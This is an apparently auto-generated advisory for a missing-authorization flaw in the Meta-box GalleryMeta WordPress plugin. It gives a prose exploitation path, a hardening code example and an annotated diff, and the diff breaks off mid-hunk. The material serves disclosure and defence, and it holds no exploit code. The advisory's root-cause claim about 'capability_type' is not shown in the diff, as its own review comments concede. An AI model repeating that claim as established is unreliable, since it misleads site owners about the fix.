Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2026-0687: Meta-box GalleryMeta <= 3.0.1 – Missing Authorization to Authenticated (Author+) Gallery Management (meta-box-gallerymeta)

CVE ID: CVE-2026-0687
Severity: Medium (CVSS 4.3)
CWE: CWE-862 (Missing Authorization)
Vulnerable Version: 3.0.1
Patched Version: 3.1
Disclosed: January 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-0687:
The Meta-box GalleryMeta WordPress plugin, versions up to and including 3.0.1, contains a missing authorization vulnerability in its custom post type registration. This allows authenticated users with Author-level permissions or higher to create and publish galleries without proper capability checks. The vulnerability has a CVSS score of 4.3, indicating medium severity.

The root cause is the plugin's registration of the 'mb_gallery' custom post type without enforcing capability checks of its own. In 'meta-box-gallerymeta/include/posttype.php', the function 'mbgmnew_gallery_post' defines the post type arguments, and its 'capability_type' parameter is set to 'post' (line 34 in the diff), so the gallery type inherits the default WordPress post capabilities, which the Author role already holds. The plugin adds no custom capability checks in its gallery management functions: the 'save_post' callback in 'gallerymetaboxes.php' (lines 73-84) writes the gallery metadata without verifying that the user holds the 'edit_posts' capability for this specific post type.

Exploitation requires an authenticated attacker with at least Author-level access. The attacker sends a POST request to the WordPress admin post editor for the 'mb_gallery' post type at '/wp-admin/post-new.php?post_type=mb_gallery', submitting gallery data through the 'mbgm_gallery_id' parameter array. The plugin processes the request through the 'save_post' action hook registered for the 'mb_gallery' post type, and no capability verification occurs before 'update_post_meta' runs, so the gallery is created and published without authorization.

The patch in version 3.1 does not directly address the missing capability check; Atomic Edge research indicates the vulnerability remains unpatched in the provided code diff. The changes are general hardening: ABSPATH guards, improved output escaping, and an updated text domain. The plugin version increments from 3.0.1 to 3.1, but the core authorization flaw persists: 'capability_type' remains 'post', and no additional capability checks are introduced in the gallery saving logic.
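As an added example (not the plugin's own code, and not the change shipped in 3.1), the following shows what a capability-aware registration of the 'mb_gallery' post type and a save handler that verifies a nonce and the per-post capability before writing 'mbgm_gallery_id' could look like. The post type name and meta key come from the advisory; every 'example_' prefixed name, the nonce action and field names, and the choice of roles granted the new capabilities are assumptions, and the snippet assumes it lives in the main plugin file.

```php
<?php
// Added example, not the plugin's own code and not the change shipped in 3.1.
// Shows a capability-aware registration for the 'mb_gallery' post type and a
// save handler that verifies a nonce and the per-post capability before writing
// the 'mbgm_gallery_id' meta. All 'example_' names are assumptions.

if ( ! defined( 'ABSPATH' ) ) {
    exit;
}

// 1. Own capabilities instead of inheriting 'post'. With map_meta_cap => true,
//    WordPress maps edit_post/publish_post on a gallery to the
//    edit_mb_galleries/publish_mb_galleries primitives granted below.
add_action( 'init', 'example_register_gallery_post_type' );
function example_register_gallery_post_type() {
    register_post_type(
        'mb_gallery',
        array(
            'public'          => true,
            'show_ui'         => true,
            'supports'        => array( 'title' ),
            'capability_type' => array( 'mb_gallery', 'mb_galleries' ),
            'map_meta_cap'    => true,
        )
    );
}

// 2. Grant the primitives only to roles that should manage galleries.
//    Runs once on activation, not on every request.
function example_grant_gallery_caps() {
    $caps = array(
        'edit_mb_gallery', 'read_mb_gallery', 'delete_mb_gallery',
        'edit_mb_galleries', 'edit_others_mb_galleries', 'publish_mb_galleries',
        'read_private_mb_galleries', 'delete_mb_galleries',
        'delete_private_mb_galleries', 'delete_published_mb_galleries',
        'delete_others_mb_galleries', 'edit_private_mb_galleries',
        'edit_published_mb_galleries',
    );
    foreach ( array( 'administrator', 'editor' ) as $role_name ) {
        $role = get_role( $role_name );
        if ( ! $role ) {
            continue;
        }
        foreach ( $caps as $cap ) {
            $role->add_cap( $cap );
        }
    }
}
register_activation_hook( __FILE__, 'example_grant_gallery_caps' );

// 3. Metabox that emits the nonce the save handler verifies.
add_action( 'add_meta_boxes_mb_gallery', 'example_add_gallery_metabox' );
function example_add_gallery_metabox() {
    add_meta_box( 'example_gallery_box', 'Gallery images', 'example_render_gallery_metabox', 'mb_gallery' );
}
function example_render_gallery_metabox() {
    wp_nonce_field( 'example_save_gallery', 'example_gallery_nonce' );
    // The image picker markup is unchanged from the plugin and not repeated here.
}

// 4. Save handler: skip autosaves, verify the nonce, check the capability on
//    this specific post, then store only integer IDs that are attachments.
add_action( 'save_post_mb_gallery', 'example_save_gallery', 10, 2 );
function example_save_gallery( $post_id, $post ) {
    if ( defined( 'DOING_AUTOSAVE' ) && DOING_AUTOSAVE ) {
        return;
    }
    $nonce = isset( $_POST['example_gallery_nonce'] ) ? sanitize_key( $_POST['example_gallery_nonce'] ) : '';
    if ( ! wp_verify_nonce( $nonce, 'example_save_gallery' ) ) {
        return;
    }
    if ( ! current_user_can( 'edit_post', $post_id ) ) {
        return;
    }
    if ( empty( $_POST['mbgm_gallery_id'] ) || ! is_array( $_POST['mbgm_gallery_id'] ) ) {
        delete_post_meta( $post_id, 'mbgm_gallery_id' );
        return;
    }
    $ids = array();
    foreach ( wp_unslash( $_POST['mbgm_gallery_id'] ) as $raw ) {
        $id = absint( $raw );
        if ( $id && 'attachment' === get_post_type( $id ) ) {
            $ids[] = $id;
        }
    }
    update_post_meta( $post_id, 'mbgm_gallery_id', $ids );
}
```

With 'map_meta_cap' enabled, current_user_can( 'edit_post', $post_id ) on a gallery resolves to the 'mb_galleries' primitives, so an Author (who is never granted 'edit_mb_galleries') is refused both by WordPress's own post.php checks and by this handler; the nonce check additionally prevents the save from being triggered by a forged cross-site request, and the absint/attachment filter keeps anything other than real attachment IDs out of the stored array.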

Successful exploitation lets an Author-level user create and publish gallery content they are not meant to control, violating the intended permission model in which only users with specific gallery management privileges create galleries. Such users can populate galleries with arbitrary images and videos, potentially hosting malicious content. The vulnerability therefore amounts to privilege escalation within the content management system: Authors gain gallery management capabilities reserved for higher-privileged roles.

Differential between vulnerable and patched code

Code Diff
--- a/meta-box-gallerymeta/gallerymetaboxes.php
+++ b/meta-box-gallerymeta/gallerymetaboxes.php
@@ -5,14 +5,17 @@
  * Description: Drag and drop multiple image upload by meta-box gallery for WordPress. Take full control over your WordPress site, build any gallery you can imagine – no programming knowledge required.
  * Author: Md. Shahinur Islam
  * Author URI: https://profiles.wordpress.org/shahinurislam
- * Version: 3.0.1
- * Text Domain: mbgm
- * Domain Path: /lang
+ * Version: 3.1
+ * Text Domain: meta-box-gallerymeta
  * Network: True
  * License: GPLv2
  * Requires at least: 5.8
  * Requires PHP: 7.4
 */
+
+if ( ! defined( 'ABSPATH' ) ) {
+    exit; // Exit if accessed directly
+}
 //--------------------- Create custom post type ---------------------------//
 define( 'MBGM_PLUGIN', __FILE__ );
 define( 'MBGM_PLUGIN_DIR', untrailingslashit( dirname( MBGM_PLUGIN ) ) );
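Review bot: the `Domain Path: /lang` header is dropped at the same time the text domain changes from `mbgm` to `meta-box-gallerymeta`; any .mo files still shipped under /lang for the old domain will no longer be loaded, so either keep the header pointing at a renamed catalog or confirm the plugin now relies solely on wordpress.org language packs. The ABSPATH guard added after the header block is the standard direct-access check and is fine as written.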
@@ -52,16 +55,16 @@
     ?>
     <table class="form-table">
       <tr><td>
-        <a class="gallery-add button" href="#" data-uploader-title="<?php esc_html_e( 'Add image(s) to gallery', 'mbgm' );?>" data-uploader-button-text="<?php esc_html_e( 'Add image(s)', 'mbgm' );?>"><?php esc_html_e( 'Add image(s) and Video(s)', 'mbgm' );?></a>
+        <a class="gallery-add button" href="#" data-uploader-title="<?php echo esc_attr__( 'Add image(s) to gallery', 'meta-box-gallerymeta' );?>" data-uploader-button-text="<?php echo esc_attr__( 'Add image(s)', 'meta-box-gallerymeta' );?>"><?php echo esc_attr__( 'Add image(s) and Video(s)', 'meta-box-gallerymeta' );?></a>
         <ul id="gallery-metabox-list">
         <?php if ($ids) :
 			foreach ($ids as $key => $value) :
 			$image = wp_get_attachment_image_src($value); ?>
           <li>
-            <input type="hidden" name="mbgm_gallery_id[<?php echo $key; ?>]" value="<?php echo $value; ?>">
+          <input type="hidden" name="mbgm_gallery_id[<?php echo esc_attr( $key ); ?>]" value="<?php echo esc_attr( $value ); ?>">
             <img class="image-preview" src="<?php echo esc_url($image[0]); ?>">
-            <a class="change-image button button-small" href="#" data-uploader-title="<?php esc_html_e( 'Change image', 'mbgm' );?>" data-uploader-button-text="<?php esc_html_e( 'Change image', 'mbgm' );?>"><?php esc_html_e( 'Change image', 'mbgm' );?></a><br>
-            <small><a class="remove-image" href="#"><?php esc_html_e( 'Remove image', 'mbgm' );?></a></small>
+            <a class="change-image button button-small" href="#" data-uploader-title="<?php esc_html_e( 'Change image', 'meta-box-gallerymeta' );?>" data-uploader-button-text="<?php esc_html_e( 'Change image', 'meta-box-gallerymeta' );?>"><?php esc_html_e( 'Change image', 'meta-box-gallerymeta' );?></a><br>
+            <small><a class="remove-image" href="#"><?php esc_html_e( 'Remove image', 'meta-box-gallerymeta' );?></a></small>
           </li>
         <?php endforeach; endif; ?>
         </ul>
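Review bot: `$image = wp_get_attachment_image_src($value)` returns false when `$value` is not an attachment ID, and the next line reads `$image[0]` without checking; since the save handler in the `@@ -74,6 +77,15 @@` hunk now stores `_caption` string entries in the same array, this loop can meet non-ID values, so guard with `if ( ! $image ) { continue; }` or skip keys ending in `_caption`. Separately, the anchor text at the end of the `gallery-add` line is element content, where `esc_html__()` is the conventional choice; `esc_attr__()` escapes the same characters, so that part is a style point only.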
@@ -74,6 +77,15 @@
     if (defined('DOING_AUTOSAVE') && DOING_AUTOSAVE) return;
     if(isset($_POST['mbgm_gallery_id'])) {
 		$array = array_map( 'sanitize_text_field', wp_unslash( $_POST['mbgm_gallery_id'] ) );
+
+    // sanitize captions if they exist
+    foreach ($array as $key => $image_id) {
+        $caption_key = "mbgm_caption_$image_id";
+        if (isset($_POST[$caption_key])) {
+            $array[$key.'_caption'] = wp_kses_post($_POST[$caption_key]);
+        }
+    }
+
 		update_post_meta($post_id, 'mbgm_gallery_id', $array);
     } else {
       delete_post_meta($post_id, 'mbgm_gallery_id');
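Review bot: within the visible lines nothing verifies a nonce or calls `current_user_can( 'edit_post', $post_id )` before `update_post_meta()`, which is the gap the advisory describes; a `save_post` handler conventionally performs both checks right after the autosave guard, and this hunk leaves that unchanged. The new caption loop has two further problems: `$_POST[$caption_key]` is not passed through `wp_unslash()` although the line above does so for the ID array, so backslashes survive into the stored caption; and `$array[$key.'_caption'] = ...` mixes caption strings into the array that every render loop treats as a list of attachment IDs, so each consumer of `mbgm_gallery_id` must now skip `_caption` keys. Storing captions under a separate meta key, or as a nested array keyed by attachment ID, avoids that.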
@@ -101,7 +113,7 @@
               <?php	global $post;	$images = get_post_meta($post->ID, 'mbgm_gallery_id', true);
                 if (is_array($images) || is_object($images))	{  ?>

-                <div id="carousel_<?php echo $post->ID;?>" class="carousel slide carousel-fade">
+                <div id="carousel_<?php echo esc_attr( $post->ID );?>" class="carousel slide carousel-fade">
                   <div class="carousel-inner">
                       <?php
                         $countn = 1;
@@ -110,21 +122,21 @@
                         if(!empty($image_obj->mbgm_youtube_url)){
                       ?>
                         <div class="carousel-item <?php echo $countn == 1 ? 'active': ''; ?>">
-                          <div class="embed-responsive embed-responsive-16by9">
-                            <iframe class="embed-responsive-item" src="https://www.youtube.com/embed/<?php echo $image_obj->mbgm_youtube_url;?>?rel=0" allowfullscreen></iframe>
+                          <div class="embed-responsive embed-responsive-16by9">
+                            <iframe class="embed-responsive-item" src="<?php echo esc_url( 'https://www.youtube.com/embed/' . $image_obj->mbgm_youtube_url . '?rel=0' ); ?>" allowfullscreen></iframe>
                           </div>
                         </div>
                       <?php  }else{ ?>
                         <div class="carousel-item <?php echo $countn == 1 ? 'active': ''; ?>">
-                          <img src="<?php echo esc_url(wp_get_attachment_url( $image ));?>" class="d-block w-100" alt="<?php echo $image_obj->post_excerpt;?>">
+                          <img src="<?php echo esc_url(wp_get_attachment_url( $image ));?>" class="d-block w-100" alt="<?php echo esc_attr($image_obj->post_excerpt);?>">
                         </div>
                       <?php  } $countn++; } ?>
                   </div>
-                      <button class="carousel-control-prev" type="button" data-bs-target="#carousel_<?php echo $post->ID;?>" data-bs-slide="prev">
+                      <button class="carousel-control-prev" type="button" data-bs-target="#carousel_<?php echo esc_attr($post->ID);?>" data-bs-slide="prev">
                         <span class="carousel-control-prev-icon" aria-hidden="true"></span>
                         <span class="visually-hidden">Previous</span>
                       </button>
-                      <button class="carousel-control-next" type="button" data-bs-target="#carousel_<?php echo $post->ID;?>" data-bs-slide="next">
+                      <button class="carousel-control-next" type="button" data-bs-target="#carousel_<?php echo esc_attr($post->ID);?>" data-bs-slide="next">
                         <span class="carousel-control-next-icon" aria-hidden="true"></span>
                         <span class="visually-hidden">Next</span>
                       </button>
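Review bot: `esc_url( 'https://www.youtube.com/embed/' . $image_obj->mbgm_youtube_url . '?rel=0' )` escapes the assembled URL but does not constrain the stored value to a video ID; characters such as `/`, `?` or `#` inside `mbgm_youtube_url` still change the embed path or query while producing a URL that `esc_url()` accepts. Validate the value as an ID when it is saved (YouTube IDs are 11 characters from `[A-Za-z0-9_-]`) or `rawurlencode()` it here. Also, the two `carousel-item` class expressions in this hunk stay unescaped while the identical expression in the `@@ -305,21 +321,22 @@` hunk is wrapped in `esc_attr()`; both are safe for a literal, but keep them consistent.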
@@ -145,15 +157,17 @@
     <ul class="pagination justify-content-end  text-right">
     <?php
     $big = 999999999; // need an unlikely integer
-      echo paginate_links( array(
-      'base' => str_replace( $big, '%#%', get_pagenum_link( $big ) ),
-      'format' => '?paged=%#%',
-      'current' => max( 1, get_query_var('paged') ),
-      'total' => $metaboxesg_main_blog->max_num_pages,
-      'prev_text'          => __( '« Previous' ),
-      'next_text'          => __( 'Next »' ),
-      'type'               => 'plain'
-    ) );
+    echo wp_kses_post(
+        paginate_links( array(
+            'base'      => str_replace( $big, '%#%', get_pagenum_link( $big ) ),
+            'format'    => '?paged=%#%',
+            'current'   => max( 1, get_query_var( 'paged' ) ),
+            'total'     => $metaboxesg_main_blog->max_num_pages,
+            'prev_text' => __( '« Previous','meta-box-gallerymeta' ),
+            'next_text' => __( 'Next »', 'meta-box-gallerymeta' ),
+            'type'      => 'plain',
+        ) )
+    );
     wp_reset_postdata();
     ?>
     </ul>
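Review bot: `paginate_links()` returns null when there is only one page, so `wp_kses_post( paginate_links( ... ) )` passes null through the sanitizer and echoes nothing; assign the result first and guard with `if ( $links ) { echo wp_kses_post( $links ); }`. The same call with identical arguments appears again in the `@@ -215,15 +229,17 @@` hunk; a small helper that builds and echoes the pagination would remove the duplication and keep the two copies from drifting.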
@@ -215,15 +229,17 @@
 			  <ul class="pagination justify-content-end  text-right">
 				<?php
 				$big = 999999999; // need an unlikely integer
-				 echo paginate_links( array(
+				 echo wp_kses_post(
+           paginate_links( array(
 					'base' => str_replace( $big, '%#%', get_pagenum_link( $big ) ),
 					'format' => '?paged=%#%',
 					'current' => max( 1, get_query_var('paged') ),
 					'total' => $metaboxesg_main_blog->max_num_pages,
-					'prev_text'          => __( '« Previous' ),
-					'next_text'          => __( 'Next »' ),
+					'prev_text'          => __( '« Previous','meta-box-gallerymeta' ),
+					'next_text'          => __( 'Next »','meta-box-gallerymeta' ),
 					'type'               => 'plain'
-				) );
+				) )
+        );
 				wp_reset_postdata();
 				?>
 			  </ul>
@@ -296,7 +312,7 @@
         <?php	global $post;	$images = get_post_meta($post->ID, 'mbgm_gallery_id', true);
           if (is_array($images) || is_object($images))	{  ?>

-          <div id="carousel_<?php echo $post->ID;?>" class="carousel slide carousel-fade">
+          <div id="carousel_<?php echo esc_attr($post->ID);?>" class="carousel slide carousel-fade">
             <div class="carousel-inner">
                 <?php
                   $countn = 1;
@@ -305,21 +321,22 @@
                   if(!empty($image_obj->mbgm_youtube_url)){
                 ?>
                   <div class="carousel-item <?php echo $countn == 1 ? 'active': ''; ?>">
-                    <div class="embed-responsive embed-responsive-16by9">
-                      <iframe class="embed-responsive-item" src="https://www.youtube.com/embed/<?php echo $image_obj->mbgm_youtube_url;?>?rel=0" allowfullscreen></iframe>
+                    <div class="embed-responsive embed-responsive-16by9">
+                      <iframe class="embed-responsive-item" src="<?php echo esc_url( 'https://www.youtube.com/embed/' . $image_obj->mbgm_youtube_url . '?rel=0' ); ?>" allowfullscreen></iframe>
+
                     </div>
                   </div>
                 <?php  }else{ ?>
-                  <div class="carousel-item <?php echo $countn == 1 ? 'active': ''; ?>">
-                    <img src="<?php echo esc_url(wp_get_attachment_url( $image ));?>" class="d-block w-100" alt="<?php echo $image_obj->post_excerpt;?>">
+                  <div class="carousel-item <?php echo esc_attr( ( 1 === $countn ) ? 'active' : '' );  ?>">
+                    <img src="<?php echo esc_url(wp_get_attachment_url( $image ));?>" class="d-block w-100" alt="<?php echo esc_attr( $image_obj->post_excerpt);?>">
                   </div>
                 <?php  } $countn++; } ?>
             </div>
-                <button class="carousel-control-prev" type="button" data-bs-target="#carousel_<?php echo $post->ID;?>" data-bs-slide="prev">
+                <button class="carousel-control-prev" type="button" data-bs-target="#carousel_<?php echo esc_attr( $post->ID);?>" data-bs-slide="prev">
                   <span class="carousel-control-prev-icon" aria-hidden="true"></span>
                   <span class="visually-hidden">Previous</span>
                 </button>
-                <button class="carousel-control-next" type="button" data-bs-target="#carousel_<?php echo $post->ID;?>" data-bs-slide="next">
+                <button class="carousel-control-next" type="button" data-bs-target="#carousel_<?php echo esc_attr( $post->ID);?>" data-bs-slide="next">
                   <span class="carousel-control-next-icon" aria-hidden="true"></span>
                   <span class="visually-hidden">Next</span>
                 </button>
@@ -345,8 +362,9 @@
     if (get_option('mbgm_plugin_do_activation_redirect', false)) {
         delete_option('mbgm_plugin_do_activation_redirect');
         if(!isset($_GET['activate-multi']))
-        {
-            wp_redirect("edit.php?post_type=mb_gallery&page=mbg_settings");
+        {
+            wp_safe_redirect( admin_url( 'edit.php?post_type=mb_gallery&page=mbg_settings' ) );
+            exit;
         }
     }
 }
@@ -392,8 +410,8 @@
   <nav>
     <div class="mbg_wrapper">
       <div class="mbg_title">
-        <h1><?php esc_html_e( 'Welcome to Meta-box GalleryMeta.', 'mbgm' ); ?></h1>
-        <h4><?php esc_html_e( 'Copy and paste this shortcode here:', 'mbgm' );?></h4>
+        <h1><?php esc_html_e( 'Welcome to Meta-box GalleryMeta.', 'meta-box-gallerymeta' ); ?></h1>
+        <h4><?php esc_html_e( 'Copy and paste this shortcode here:', 'meta-box-gallerymeta' );?></h4>
       </div>
       <div class="mbg_switch-btn">
         <div class="mbg_switch-text">
@@ -423,11 +441,11 @@
           <p>Classic with Slider</p>
         </div>
         <div class="mbg_card-content">
-		     <img src="<?php echo plugin_dir_url( __FILE__ ). 'images/gallery.jpg'?>" width="90%">
+		     <img src="<?php echo esc_url(plugin_dir_url( __FILE__ ). 'images/gallery.jpg');?>" width="90%">
         </div>
         <div class="mbg_card-footer">
           <div class="mbg_footer-wrapper">
-            <h4><?php esc_html_e( '[mbg-front-show]', 'mbgm' );?></h4>
+            <h4><?php esc_html_e( '[mbg-front-show]', 'meta-box-gallerymeta' );?></h4>
           </div>
         </div>
       </div>
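Review bot: the shortcode tag `[mbg-front-show]` is wrapped in `esc_html_e()`, which makes it translatable; a translator who changes the string causes the settings page to display a shortcode that does not exist. Display shortcode tags with `esc_html( '[mbg-front-show]' )` and reserve translation functions for human-readable text. The same pattern repeats for every card in the following hunks.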
@@ -437,11 +455,11 @@
           <p>Mordan</p>
         </div>
         <div class="mbg_card-content">
-          <img src="<?php echo plugin_dir_url( __FILE__ ). 'images/mordan.jpg'?>" width="90%">
+          <img src="<?php echo esc_url(plugin_dir_url( __FILE__ ). 'images/mordan.jpg'); ?>" width="90%">
         </div>
         <div class="mbg_card-footer">
           <div class="mbg_footer-wrapper">
-            <h4><?php esc_html_e( '[mbg-front-mordan]', 'mbgm' );?></h4>
+            <h4><?php esc_html_e( '[mbg-front-mordan]', 'meta-box-gallerymeta' );?></h4>
           </div>
         </div>
       </div>
@@ -451,11 +469,11 @@
           <p>Premium</p>
         </div>
         <div class="mbg_card-content">
-			  <img src="<?php echo plugin_dir_url( __FILE__ ). 'images/primium.jpg'?>" width="90%">
+			  <img src="<?php echo esc_url( plugin_dir_url( __FILE__ ). 'images/primium.jpg');?>" width="90%">
         </div>
         <div class="mbg_card-footer">
           <div class="mbg_footer-wrapper">
-            <h4 class="red"><?php esc_html_e( '[mbg-front-carousel]', 'mbgm' );?></h4>
+            <h4 class="red"><?php esc_html_e( '[mbg-front-carousel]', 'meta-box-gallerymeta' );?></h4>
           </div>
         </div>
       </div>
@@ -465,12 +483,12 @@
           <p>Professional</p>
         </div>
         <div class="mbg_card-content">
-			    <img src="<?php echo plugin_dir_url( __FILE__ ). 'images/single_gallery.jpg'?>" width="90%">
+			    <img src="<?php echo  esc_url(plugin_dir_url( __FILE__ ). 'images/single_gallery.jpg');?>" width="90%">
         </div>
         <div class="mbg_card-footer">
           <div class="mbg_footer-wrapper">
             <div class="mbg_icon-down"></div>
-            <h4 class="red"><?php esc_html_e( "[mbgm_gallery post_id='123']", 'mbgm' );?></h4>
+            <h4 class="red"><?php esc_html_e( "[mbgm_gallery post_id='123']", 'meta-box-gallerymeta' );?></h4>
           </div>
         </div>
       </div>
@@ -488,12 +506,12 @@
           <p>Slider 1</p>
         </div>
         <div class="mbg_card-content">
-			    <img src="<?php echo plugin_dir_url( __FILE__ ). 'slider/slider-1/slider-1.jpg'?>" width="90%">
+			    <img src="<?php echo  esc_url(plugin_dir_url( __FILE__ ). 'slider/slider-1/slider-1.jpg');?>" width="90%">
         </div>
         <div class="mbg_card-footer">
           <div class="mbg_footer-wrapper">
             <div class="mbg_icon-down"></div>
-            <h4><?php esc_html_e( "[mbgm_sliders style='1']", 'mbgm' );?></h4>
+            <h4><?php esc_html_e( "[mbgm_sliders style='1']", 'meta-box-gallerymeta' );?></h4>
           </div>
         </div>
       </div>
@@ -502,12 +520,12 @@
           <p>Slider 2</p>
         </div>
         <div class="mbg_card-content">
-			    <img src="<?php echo plugin_dir_url( __FILE__ ). 'slider/slider-1/slider-2.jpg'?>" width="90%">
+			    <img src="<?php echo esc_url(plugin_dir_url( __FILE__ ). 'slider/slider-1/slider-2.jpg');?>" width="90%">
         </div>
         <div class="mbg_card-footer">
           <div class="mbg_footer-wrapper">
             <div class="mbg_icon-down"></div>
-            <h4><?php esc_html_e( "[mbgm_sliders style='2']", 'mbgm' );?></h4>
+            <h4><?php esc_html_e( "[mbgm_sliders style='2']", 'meta-box-gallerymeta' );?></h4>
           </div>
         </div>
       </div>
@@ -516,12 +534,12 @@
           <p>Slider 3</p>
         </div>
         <div class="mbg_card-content">
-			    <img src="<?php echo plugin_dir_url( __FILE__ ). 'slider/slider-3/slider-3.jpg'?>" width="90%">
+			    <img src="<?php echo esc_url(plugin_dir_url( __FILE__ ). 'slider/slider-3/slider-3.jpg');?>" width="90%">
         </div>
         <div class="mbg_card-footer">
           <div class="mbg_footer-wrapper">
             <div class="mbg_icon-down"></div>
-            <h4><?php esc_html_e( "[mbgm_sliders style='3']", 'mbgm' );?></h4>
+            <h4><?php esc_html_e( "[mbgm_sliders style='3']", 'meta-box-gallerymeta' );?></h4>
           </div>
         </div>
       </div>
@@ -530,12 +548,12 @@
           <p>Slider 4</p>
         </div>
         <div class="mbg_card-content">
-			    <img src="<?php echo plugin_dir_url( __FILE__ ). 'slider/slider-4/slider-4.jpg'?>" width="90%">
+			    <img src="<?php echo esc_url(plugin_dir_url( __FILE__ ). 'slider/slider-4/slider-4.jpg');?>" width="90%">
         </div>
         <div class="mbg_card-footer">
           <div class="mbg_footer-wrapper">
             <div class="mbg_icon-down"></div>
-            <h4><?php esc_html_e( "[mbgm_sliders style='4']", 'mbgm' );?></h4>
+            <h4><?php esc_html_e( "[mbgm_sliders style='4']", 'meta-box-gallerymeta' );?></h4>
           </div>
         </div>
       </div>
@@ -545,12 +563,12 @@
           <p>Slider 5</p>
         </div>
         <div class="mbg_card-content">
-			    <img src="<?php echo plugin_dir_url( __FILE__ ). 'slider/slider-5/slider-5.jpg'?>" width="90%">
+			    <img src="<?php echo esc_url(plugin_dir_url( __FILE__ ). 'slider/slider-5/slider-5.jpg');?>" width="90%">
         </div>
         <div class="mbg_card-footer">
           <div class="mbg_footer-wrapper">
             <div class="mbg_icon-down"></div>
-            <h4><?php esc_html_e( "[mbgm_sliders style='5']", 'mbgm' );?></h4>
+            <h4><?php esc_html_e( "[mbgm_sliders style='5']", 'meta-box-gallerymeta' );?></h4>
           </div>
         </div>
       </div>
@@ -576,7 +594,7 @@
 // Add a "Custom Column" column to the Books post type
 add_filter('manage_mb_gallery_posts_columns', 'add_custom_column');
 function add_custom_column($columns) {
-    $columns['mbgmshortcode'] = __('MBGM Shortcode', 'mbgm');
+    $columns['mbgmshortcode'] = __('MBGM Shortcode', 'meta-box-gallerymeta');
     return $columns;
 }
 // Display custom data in the new column
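Review bot: the comment `Add a "Custom Column" column to the Books post type` does not describe this code, which adds a column to `mb_gallery`. More importantly, `add_custom_column` is an unprefixed global function hooked to `manage_mb_gallery_posts_columns`; any other plugin declaring `add_custom_column()` produces a fatal redeclaration error, so give it the `mbgm_` prefix used elsewhere in the plugin.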
--- a/meta-box-gallerymeta/include/enqueue.php
+++ b/meta-box-gallerymeta/include/enqueue.php
@@ -1,4 +1,7 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) {
+    exit; // Exit if accessed directly
+}
 function mbgm_metabox_enqueue($hook) {
     if ( 'post.php' == $hook || 'post-new.php' == $hook ) {
       wp_enqueue_script('mbgm-admin-js', plugin_dir_url( __DIR__ ). 'js/gallery-metabox.js', array('jquery'),'1.0.0',true);
--- a/meta-box-gallerymeta/include/medianame.php
+++ b/meta-box-gallerymeta/include/medianame.php
@@ -1,4 +1,7 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) {
+    exit; // Exit if accessed directly
+}
 /**
  * Add fields to media uploader
  *
--- a/meta-box-gallerymeta/include/posttype.php
+++ b/meta-box-gallerymeta/include/posttype.php
@@ -1,25 +1,28 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) {
+    exit; // Exit if accessed directly
+}
 add_action( 'init', 'mbgmnew_gallery_post' );
 function mbgmnew_gallery_post() {
 	$labels = array(
-		'name'               => _x( 'MB Gallery', 'post type general name', 'mbgm' ),
-		'singular_name'      => _x( 'MB Gallery', 'post type singular name', 'mbgm' ),
-		'menu_name'          => _x( 'MB Gallery', 'admin menu', 'mbgm' ),
-		'name_admin_bar'     => _x( 'MB Gallery', 'add new on admin bar', 'mbgm' ),
-		'add_new'            => _x( 'Add New', 'MB Gallery', 'mbgm' ),
-		'add_new_item'       => __( 'Add New MBG', 'mbgm' ),
-		'new_item'           => __( 'New MBG', 'mbgm' ),
-		'edit_item'          => __( 'Edit MBG', 'mbgm' ),
-		'view_item'          => __( 'View MBG', 'mbgm' ),
-		'all_items'          => __( 'Gallery', 'mbgm' ),
-		'search_items'       => __( 'Search MBG', 'mbgm' ),
-		'parent_item_colon'  => __( 'Parent MBG:', 'mbgm' ),
-		'not_found'          => __( 'No MBG found.', 'mbgm' ),
-		'not_found_in_trash' => __( 'No MBG found in Trash.', 'mbgm' )
+		'name'               => _x( 'MB Gallery', 'post type general name', 'meta-box-gallerymeta' ),
+		'singular_name'      => _x( 'MB Gallery', 'post type singular name', 'meta-box-gallerymeta' ),
+		'menu_name'          => _x( 'MB Gallery', 'admin menu', 'meta-box-gallerymeta' ),
+		'name_admin_bar'     => _x( 'MB Gallery', 'add new on admin bar', 'meta-box-gallerymeta' ),
+		'add_new'            => _x( 'Add New', 'MB Gallery', 'meta-box-gallerymeta' ),
+		'add_new_item'       => __( 'Add New MBG', 'meta-box-gallerymeta' ),
+		'new_item'           => __( 'New MBG', 'meta-box-gallerymeta' ),
+		'edit_item'          => __( 'Edit MBG', 'meta-box-gallerymeta' ),
+		'view_item'          => __( 'View MBG', 'meta-box-gallerymeta' ),
+		'all_items'          => __( 'Gallery', 'meta-box-gallerymeta' ),
+		'search_items'       => __( 'Search MBG', 'meta-box-gallerymeta' ),
+		'parent_item_colon'  => __( 'Parent MBG:', 'meta-box-gallerymeta' ),
+		'not_found'          => __( 'No MBG found.', 'meta-box-gallerymeta' ),
+		'not_found_in_trash' => __( 'No MBG found in Trash.', 'meta-box-gallerymeta' )
 	);
 	$args = array(
 		'labels'             => $labels,
-        'description'        => __( 'Description.', 'mbgm' ),
+        'description'        => __( 'Description.', 'meta-box-gallerymeta' ),
 		'public'             => true,
 		'publicly_queryable' => true,
 		'show_ui'            => true,
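Review bot: this hunk only changes label text domains, yet the advisory names `mbgmnew_gallery_post` as the root cause because `capability_type` is `post`; the capability entries of `$args` fall outside the visible context, so that claim cannot be confirmed from the diff itself. If gallery management is meant to be limited to roles above Author, this `$args` array is where `capability_type`/`capabilities` with `map_meta_cap => true` would be set, with the resulting capabilities granted to the intended roles on activation.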
@@ -39,24 +42,24 @@
 add_action( 'init', 'mbgmnew_Slider_post' );
 function mbgmnew_Slider_post() {
 	$labels = array(
-		'name'               => _x( 'Sliders', 'post type general name', 'mbgm' ),
-		'singular_name'      => _x( 'Slider', 'post type singular name', 'mbgm' ),
-		'menu_name'          => _x( 'Slider', 'admin menu', 'mbgm' ),
-		'name_admin_bar'     => _x( 'Slider', 'add new on admin bar', 'mbgm' ),
-		'add_new'            => _x( 'Add New', 'Slider', 'mbgm' ),
-		'add_new_item'       => __( 'Add New Slider', 'mbgm' ),
-		'new_item'           => __( 'New Slider', 'mbgm' ),
-		'edit_item'          => __( 'Edit Slider', 'mbgm' ),
-		'view_item'          => __( 'View Slider', 'mbgm' ),
-		'all_items'          => __( 'All Sliders', 'mbgm' ),
-		'search_items'       => __( 'Search Slider', 'mbgm' ),
-		'parent_item_colon'  => __( 'Parent Slider:', 'mbgm' ),
-		'not_found'          => __( 'No Slider found.', 'mbgm' ),
